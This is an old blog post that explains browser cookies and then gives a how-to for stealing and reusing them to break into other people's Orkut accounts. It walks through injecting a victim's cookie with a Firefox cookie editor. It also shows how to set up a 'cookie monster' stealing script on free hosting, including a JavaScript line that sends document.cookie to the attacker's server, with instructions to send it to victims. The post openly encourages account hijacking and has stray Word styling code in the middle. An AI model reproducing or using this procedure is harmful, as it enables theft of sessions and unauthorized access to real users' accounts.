1]what are cookies?
A:-Cookies are text messages/files given to a web browser by web server.The main purpose of a cookie is to identify users and possibly prepare customized web pages or to save site login information for you.When you enter a web site using cookies, you may be asked to fill out a form providing such information as your name;
email address etc. This information is packaged into a cookie and sent to your web browser,which store it for later use.The next time you go to the same web site,your browser will send the cookie to the web server.The message is then sent back to the server each time the browser requests a page from the server.

A web server has no memory so the hosted website you are visiting transfers a cookie file of the browser on your computer’s hard disk so that the web site can remember who you are and your preferences.This message exchange allows the web server to use this information to present you with customized Web pages

Types of Cookies:

[a]session cookie:
Its also called a transient cookie.Its a cookie that is erased when u close the Webbrowser.The session cookie is stored in temporary memory and is not retained after the browser is closed.,Sessions cookies do not collect the information on your computers. They typically will store information in the forms of a session identification that does not personally identify the user.

[b]persistent cookie:
Its also called a permanent cookie or a stored cookie,a cookie that is stored on your hard drive until it expires (persistent cookies are set with expiration dates)or until you delete the cookie.Persistent cookies are used to collect identifying information about the user, such as Web surfing behavior or user preferences for a specific Web site.

How To Use Victim Cookies?

Cookies can be used to to Login into others accounts without knowing his/her pass

First we need Firefox add-on(cookie editor) to add this cookies to the Browser
Download the add-on here https://addons.mozilla.org/en-US/firefox/addon/573

Install the add-on then restart your FF

Now use the cookie stealing script or a fake application with a cookie stealing script to obtain the victims cookies.

Go to Tools–>Cookies Editor —> select Add
http://www.orkut.co.in/AlbumZoom.aspx?uid=13758045739414020276&pid=1218191708969&aid=1

Fill Name : orkut_state

Contents : Fill in the cookies here

Host : .www.orkut.co.in

Then click save

Now Hit Refresh , You can notice that u have logged in victims id

2]How to use cookie monster?

Lets start and Make the ultimate cookie exploit to hack Orkut

1.Go to Lenhost.info . Make a free Hosting account .

2.It will mail u all the details as ftp / My Sql username and password

3. Download Install.php from here

http://rapidshare.com/files/53318259/install.php

4. Upload this file on the server and run .

5 . It will Open as : a Installer

6. Fill the Coloums :

Database : its something like username_name

For this go to mysql and make a database there .

Password : Your Password

User : sent to u by mail

Table : Give any name in this column

Server : This is found in mysql

Admin Password : Provide a pass to access admin area

Once you are done select Submit .

7. Next page in the end show u some links get the 4th link

8.javascript:document.location=’http://orkut.lenhost.info/getmonster.php?cookie=‘+encodeURIComponent(document.cookie);void(0)

Replace My link wid urs in the above javascript.

9. Done send it to ur victim when victim runs this his cookies gets stolen

10. Receiving cookies open admin area http://name.lenhost.info/logmonster.php it asks for the pass login with the pass u provided during installation.

<!– /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:””; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:”Times New Roman”; mso-fareast-font-family:”Times New Roman”;} h3 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:3; font-size:13.5pt; font-family:”Times New Roman”;} a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;} div.Section1 {page:Section1;} –>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:”Table Normal”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:””;
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:”Times New Roman”;
mso-ansi-language:#0400;
mso-fareast-language:#0400;
mso-bidi-language:#0400;}

Note:-You can either use cookie monster or any cookie staling script to obtain cookies.For more information plz refer to the following topics

http://www.orkut.co.in/CommMsgs.aspx?cmm=43323325&tid=5212232745554622947
http://www.orkut.co.in/CommMsgs.aspx?cmm=43323325&tid=2587081189494761589
http://www.orkut.co.in/CommMsgs.aspx?cmm=43323325&tid=5228584562328151586

Enjoyeeeeee 🙂

Kuntal (Sr. System Administrator)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: